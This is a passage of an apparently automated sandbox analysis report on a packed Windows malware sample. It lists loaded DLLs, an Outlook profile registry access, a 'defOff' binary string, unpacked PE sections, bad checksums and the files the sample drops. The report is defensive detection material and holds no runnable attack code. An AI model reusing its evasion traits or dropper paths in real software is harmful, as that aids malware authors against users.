Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1789440 > 1048576
Source: file.exe Static PE information: Raw size of wkrmqwho is bigger than: 0x100000 < 0x19b000
Source: Binary string: UxTheme.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: rsaenh.pdb source: firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: ktmw32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WscApi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8WinTypes.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdbh source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xul.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nssckbi.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: cryptsp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8softokn3.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: profapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntmarta.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shell32.pdbXULBroadcastManager source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLBCatQ.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: urlmon.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8twinapi.appcore.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8kernelbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: UxTheme.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8CoreMessaging.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLBCatQ.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8bcryptprimitives.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: srvcli.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: imm32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: freebl3.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: version.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mswsock.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8gkcodecs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8iphlpapi.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8ExplorerFrame.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nsi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winmm.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 2aff342b40.exe, 00000023.00000003.2855859321.00000000049E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8osclientcerts.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8CoreUIComponents.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8cryptbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msasn1.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8msvcp140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ncrypt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8webauthn.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Kernel.Appcore.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8powrprof.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8MMDevAPI.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wininet.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8kernel32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8oleaut32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: rpcrt4.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8TextInputFramework.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wshbth.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8InputHost.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8ucrtbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000031.00000002.3375134799.0000024F747BC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsock32.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8audioses.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sspicli.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8rasadhlp.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8msvcp_win.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8taskschd.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: propsys.pdb8 source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dnsapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nlaapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8fwpuclnt.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winhttp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msimg32.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mswsock.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntasn1.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: devobj.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8advapi32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Windows.Storage.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8OnDemandConnRouteHelper.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: propsys.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8netprofm.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: gdi32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: avrt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Windows.Globalization.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000031.00000002.3376454757.0000024F749A9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WLDP.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8vcruntime140_1.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8lgpllibs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nssckbi.pdb@ source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8gdi32full.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8vcruntime140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winrnr.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: version.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbgcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8OnDemandConnRouteHelper.pdb0B source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: user32.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8DataExchange.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8wintrust.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: psapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8WindowManagementAPI.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8npmproxy.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8linkinfo.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Windows.UI.Immersive.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW;
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Unpacked PE file: 9.2.DocumentsKECFIDGCBF.exe.820000.0.unpack :EW;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 10.2.skotes.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Unpacked PE file: 15.2.aedbd2e320.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Unpacked PE file: 16.2.0718eb7837.exe.bc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ackgsmri:EW;nodwasaq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ackgsmri:EW;nodwasaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Unpacked PE file: 32.2.aedbd2e320.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: aedbd2e320.exe.11.dr Static PE information: real checksum: 0x1b99be should be: 0x1c31b7
Source: random[1].exe0.11.dr Static PE information: real checksum: 0x1b99be should be: 0x1c31b7
Source: random[2].exe.11.dr Static PE information: real checksum: 0x2bd557 should be: 0x2ba4fd
Source: random[1].exe.0.dr Static PE information: real checksum: 0x43dc27 should be: 0x44439c
Source: random[1].exe.11.dr Static PE information: real checksum: 0x1cdfd4 should be: 0x1d040a
Source: 0718eb7837.exe.11.dr Static PE information: real checksum: 0x1cdfd4 should be: 0x1d040a
Source: 2aff342b40.exe.11.dr Static PE information: real checksum: 0x2bd557 should be: 0x2ba4fd
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: real checksum: 0x1d050c should be: 0x1d89c1
Source: fa55e7c5ed.exe.11.dr Static PE information: real checksum: 0x43dc27 should be: 0x44439c
Source: skotes.exe.9.dr Static PE information: real checksum: 0x1d050c should be: 0x1d89c1
Source: file.exe Static PE information: real checksum: 0x1b99be should be: 0x1c31b7
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: wkrmqwho
Source: file.exe Static PE information: section name: fzxxpvmm
Source: file.exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name: .idata
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name: brwftgiw
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name: oajgfsxl
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .rsrc
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: bgrcdjci
Source: random[1].exe.0.dr Static PE information: section name: aezraviv
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: .idata
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: brwftgiw
Source: skotes.exe.9.dr Static PE information: section name: oajgfsxl
Source: skotes.exe.9.dr Static PE information: section name: .taggant
Source: fa55e7c5ed.exe.11.dr Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: .rsrc
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: .idata
Source: fa55e7c5ed.exe.11.dr Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: bgrcdjci
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: aezraviv
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: .taggant
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name: .idata
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name: ackgsmri
Source: random[1].exe.11.dr Static PE information: section name: nodwasaq
Source: random[1].exe.11.dr Static PE information: section name: .taggant
Source: 0718eb7837.exe.11.dr Static PE information: section name:
Source: 0718eb7837.exe.11.dr Static PE information: section name: .idata
Source: 0718eb7837.exe.11.dr Static PE information: section name:
Source: 0718eb7837.exe.11.dr Static PE information: section name: ackgsmri
Source: 0718eb7837.exe.11.dr Static PE information: section name: nodwasaq
Source: 0718eb7837.exe.11.dr Static PE information: section name: .taggant
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: .idata
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: wkrmqwho
Source: random[1].exe0.11.dr Static PE information: section name: fzxxpvmm
Source: random[1].exe0.11.dr Static PE information: section name: .taggant
Source: aedbd2e320.exe.11.dr Static PE information: section name:
Source: aedbd2e320.exe.11.dr Static PE information: section name: .idata
Source: aedbd2e320.exe.11.dr Static PE information: section name:
Source: aedbd2e320.exe.11.dr Static PE information: section name: wkrmqwho
Source: aedbd2e320.exe.11.dr Static PE information: section name: fzxxpvmm
Source: aedbd2e320.exe.11.dr Static PE information: section name: .taggant
Source: random[2].exe.11.dr Static PE information: section name:
Source: random[2].exe.11.dr Static PE information: section name: .idata
Source: random[2].exe.11.dr Static PE information: section name: jajeyrhy
Source: random[2].exe.11.dr Static PE information: section name: xqskffqo
Source: random[2].exe.11.dr Static PE information: section name: .taggant
Source: 2aff342b40.exe.11.dr Static PE information: section name:
Source: 2aff342b40.exe.11.dr Static PE information: section name: .idata
Source: 2aff342b40.exe.11.dr Static PE information: section name: jajeyrhy
Source: 2aff342b40.exe.11.dr Static PE information: section name: xqskffqo
Source: 2aff342b40.exe.11.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A0D91C push ecx; ret 11_2_00A0D92F
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
